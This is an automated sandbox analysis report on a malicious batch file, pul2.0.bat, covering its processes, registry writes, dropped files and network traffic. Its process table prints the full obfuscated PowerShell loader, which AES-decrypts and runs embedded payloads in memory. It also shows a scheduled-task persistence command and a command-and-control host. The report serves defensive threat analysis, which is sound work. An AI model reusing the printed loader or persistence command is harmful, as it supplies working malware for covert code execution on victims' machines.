| File name: | pul2.0.bat |
| Full analysis: | https://app.any.run/tasks/c84c8d2e-18c3-4322-9f14-a6d9d95beb2a |
| Verdict: | Malicious activity |
| Analysis date: | April 14, 2025, 19:07:06 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/x-msdos-batch |
| File info: | DOS batch file, ASCII text, with very long lines (38228), with CRLF line terminators |
| MD5: | 9310B13BFD53C140C585EA5293B618A2 |
| SHA1: | 7BF308F58D89F66E19016CC92A3BF0D29E2CBF9B |
| SHA256: | 3F1BF6CCA44CDCE747726F324DC57211ABDE48A9E58E325A3ED9BE75FEACEBA6 |
| SSDEEP: | 24576:7lr1VyOtQYuyWHBh+7clW1qTNyG0bvexDm2zz6Rr6lKTMjcPiFmv+nvYbBXcUKBE:7F2Dek4e1Dzz6JVKnbSRPyI |
MALICIOUS
Run PowerShell with an invisible window
- powershell.exe (PID: 5512)
- powershell.exe (PID: 7156)
Uses AES cipher (POWERSHELL)
- powershell.exe (PID: 5512)
- powershell.exe (PID: 7156)
Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)
- powershell.exe (PID: 5512)
- powershell.exe (PID: 7156)
Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)
- powershell.exe (PID: 5512)
- powershell.exe (PID: 7156)
GENERIC has been found (auto)
- powershell.exe (PID: 5512)
Uses Task Scheduler to autorun other applications
- powershell.exe (PID: 7156)
SUSPICIOUS
Executing commands from a ".bat" file
- cmd.exe (PID: 2088)
- cmd.exe (PID: 6480)
Starts CMD.EXE for commands execution
- cmd.exe (PID: 2088)
- msconfig.exe (PID: 900)
- cmd.exe (PID: 6480)
Cryptography encrypted command line is found
- cmd.exe (PID: 3180)
- cmd.exe (PID: 4380)
Starts POWERSHELL.EXE for commands execution
- cmd.exe (PID: 2088)
- cmd.exe (PID: 6480)
Application launched itself
- cmd.exe (PID: 2088)
- cmd.exe (PID: 6480)
Executable content was dropped or overwritten
- powershell.exe (PID: 5512)
Process drops legitimate windows executable
- powershell.exe (PID: 5512)
Executes application which crashes
- msconfig.exe (PID: 900)
Connects to unusual port
- powershell.exe (PID: 7156)
Potential Corporate Privacy Violation
- svchost.exe (PID: 2196)
INFO
Checks current location (POWERSHELL)
- powershell.exe (PID: 5512)
- powershell.exe (PID: 7156)
Uses string replace method (POWERSHELL)
- powershell.exe (PID: 5512)
- powershell.exe (PID: 7156)
Gets data length (POWERSHELL)
- powershell.exe (PID: 5512)
- powershell.exe (PID: 7156)
Uses string split method (POWERSHELL)
- powershell.exe (PID: 5512)
- powershell.exe (PID: 7156)
The sample compiled with english language support
- powershell.exe (PID: 5512)
Checks supported languages
- msconfig.exe (PID: 900)
Reads the computer name
- msconfig.exe (PID: 900)
Creates files or folders in the user directory
- WerFault.exe (PID: 6372)
Checks proxy server information
- slui.exe (PID: 5164)
Reads the software policy settings
- slui.exe (PID: 5164)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
146
Monitored processes
15
Malicious processes
5
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 900 | "C:\Windows \System32\msconfig.exe" | C:\Windows \System32\msconfig.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: System Configuration Utility Exit code: 3 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1164 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2088 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\pul2.0.bat" " | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2196 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3180 | C:\WINDOWS\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CJBgsqhmvjZatLDUYrQJ4YC8c2aIxIUcT8v5/66rHhA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/NIhXVINyDKF/ru+U/a7xQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EPslc=New-Object System.IO.MemoryStream(,$param_var); $znYxF=New-Object System.IO.MemoryStream; $SCPWQ=New-Object System.IO.Compression.GZipStream($EPslc, [IO.Compression.CompressionMode]::Decompress); $SCPWQ.CopyTo($znYxF); $SCPWQ.Dispose(); $EPslc.Dispose(); $znYxF.Dispose(); $znYxF.ToArray();}function execute_function($param_var,$param2_var){ $GbzBV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $cOnBq=$GbzBV.EntryPoint; $cOnBq.Invoke($null, $param2_var);}$BdZYz = 'C:\Users\admin\Desktop\pul2.0.bat';$host.UI.RawUI.WindowTitle = $BdZYz;$fdVJR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($BdZYz).Split([Environment]::NewLine);foreach ($Nmuez in $fdVJR) { if ($Nmuez.StartsWith('qbQaicQgyzFIRpePAJOg')) { $pKmFX=$Nmuez.Substring(20); break; }}$payloads_var=[string[]]$pKmFX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); " | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4188 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | schtasks.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4380 | C:\WINDOWS\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CJBgsqhmvjZatLDUYrQJ4YC8c2aIxIUcT8v5/66rHhA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/NIhXVINyDKF/ru+U/a7xQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EPslc=New-Object System.IO.MemoryStream(,$param_var); $znYxF=New-Object System.IO.MemoryStream; $SCPWQ=New-Object System.IO.Compression.GZipStream($EPslc, [IO.Compression.CompressionMode]::Decompress); $SCPWQ.CopyTo($znYxF); $SCPWQ.Dispose(); $EPslc.Dispose(); $znYxF.Dispose(); $znYxF.ToArray();}function execute_function($param_var,$param2_var){ $GbzBV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $cOnBq=$GbzBV.EntryPoint; $cOnBq.Invoke($null, $param2_var);}$BdZYz = 'C:\Users\admin\Desktop\pul2.0.bat';$host.UI.RawUI.WindowTitle = $BdZYz;$fdVJR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($BdZYz).Split([Environment]::NewLine);foreach ($Nmuez in $fdVJR) { if ($Nmuez.StartsWith('qbQaicQgyzFIRpePAJOg')) { $pKmFX=$Nmuez.Substring(20); break; }}$payloads_var=[string[]]$pKmFX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); " | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4464 | "schtasks" /create /tn "Startup" /sc ONLOGON /tr "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5164 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5512 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 4294967295 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
15 438
Read events
15 429
Write events
4
Delete events
5
Modification events
| (PID) Process: | (5512) powershell.exe | Key: | HKEY_CURRENT_USER\Environment |
| Operation: | write | Name: | phantombp |
Value: C:\Users\admin\Desktop\pul2.0.bat | |||
| (PID) Process: | (6372) WerFault.exe | Key: | \REGISTRY\A\{6c586633-de1e-2535-c5cf-d6291c070588}\Root\InventoryApplicationFile |
| Operation: | write | Name: | WritePermissionsCheck |
Value: 1 | |||
| (PID) Process: | (6372) WerFault.exe | Key: | \REGISTRY\A\{6c586633-de1e-2535-c5cf-d6291c070588}\Root\InventoryApplicationFile\PermissionsCheckTestKey |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (5512) powershell.exe | Key: | HKEY_CURRENT_USER\Environment |
| Operation: | delete value | Name: | phantombp |
Value: C:\Users\admin\Desktop\pul2.0.bat | |||
| (PID) Process: | (7156) powershell.exe | Key: | HKEY_CURRENT_USER\Environment |
| Operation: | delete value | Name: | phantombp |
Value: | |||
Executable files
2
Suspicious files
5
Text files
5
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6372 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msconfig.exe_fc9e2461a5d788554d4233fcf397cd7c9dc2c4c_b075896e_645ae12b-c63a-4382-a571-bfd66301a2cc\Report.wer | — | |
MD5:— | SHA256:— | |||
| 6372 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\Temp\WERE226.tmp.xml | xml | |
MD5:6181F7E301AA9CF46FAE54D914435BCA | SHA256:21FCF795C4E7A9022FF29D2AFF0191D7CCD5D5BED4367F5DEB32387E8D673C15 | |||
| 7156 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wdh1hkha.gnh.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5512 | powershell.exe | C:\Windows \System32\msconfig.exe | executable | |
MD5:BFD3E1F90B944B660C0A09661C418428 | SHA256:8BEE8EA97039D663208A2C8A209417EE6ADE3F2E11D9AFE6A511AE6CFA5EFCAD | |||
| 6372 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\Temp\WERE1F6.tmp.WERInternalMetadata.xml | binary | |
MD5:209853F4B4672A754F45BAD075989FA7 | SHA256:7D5DD3A0BAFF9951CA28E72AF62DF691945FBAF82411C551D2F8F16207DFF1F7 | |||
| 6372 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\Temp\WERE07E.tmp.dmp | binary | |
MD5:3E40D6692A596329D18F010171E72CB2 | SHA256:8D205728443F4CE9F4DED2EEB4ABA147F1A7512D726FE16C90936BEB68AC2BD4 | |||
| 5512 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | binary | |
MD5:F33AF4C128551A73694B0FD12E49B4A5 | SHA256:86EBF61AAC3E52415AEFA352A0EB201B6FD835EB4AC45BDBA0D80E81EB62EE8F | |||
| 6372 | WerFault.exe | C:\Users\admin\AppData\Local\CrashDumps\msconfig.exe.900.dmp | binary | |
MD5:3F598D11E02D44DB976ABA45DCF9D759 | SHA256:77AE99E40FDB68F70CD496BB18DBE9005CC168A8C66AAD05179B68CD972B7522 | |||
| 5512 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ob34h3dp.lfr.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6372 | WerFault.exe | C:\Windows\appcompat\Programs\Amcache.hve | binary | |
MD5:419DE712B6CE98A42BF725ED9BD583A4 | SHA256:C16730DE0E58345038D77747B28F4FAED583960123F11D819205F2591377D58C | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
35
TCP/UDP connections
3 015
DNS requests
18
Threats
2
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2104 | svchost.exe | GET | 200 | 2.16.241.19:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | GET | 304 | 4.245.163.56:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | — | — | — |
4452 | SIHClient.exe | GET | 200 | 23.219.150.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl | unknown | — | — | whitelisted |
4452 | SIHClient.exe | GET | 200 | 23.219.150.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl | unknown | — | — | whitelisted |
4452 | SIHClient.exe | GET | 200 | 23.219.150.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.2.crl | unknown | — | — | whitelisted |
4452 | SIHClient.exe | GET | 200 | 2.16.241.19:80 | http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl | unknown | — | — | whitelisted |
4452 | SIHClient.exe | GET | 200 | 2.16.241.19:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl | unknown | — | — | whitelisted |
4452 | SIHClient.exe | GET | 200 | 23.219.150.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
4452 | SIHClient.exe | GET | 200 | 23.219.150.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 52.165.164.15:443 | https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping | unknown | — | — | — |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2104 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
6876 | RUXIMICS.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
2104 | svchost.exe | 2.16.241.19:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
3216 | svchost.exe | 172.211.123.249:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
6544 | svchost.exe | 20.190.160.130:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
7156 | powershell.exe | 193.161.193.99:4782 | leomezullu-33641.portmap.io | OOO Bitree Networks | RU | malicious |
4452 | SIHClient.exe | 4.245.163.56:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
leomezullu-33641.portmap.io |
| malicious |
slscr.update.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
arc.msn.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2196 | svchost.exe | Potential Corporate Privacy Violation | ET INFO DNS Query to a Reverse Proxy Service Observed |
2196 | svchost.exe | Misc activity | ET INFO DNS Query for Port Mapping/Tunneling Service Domain (.portmap .io) |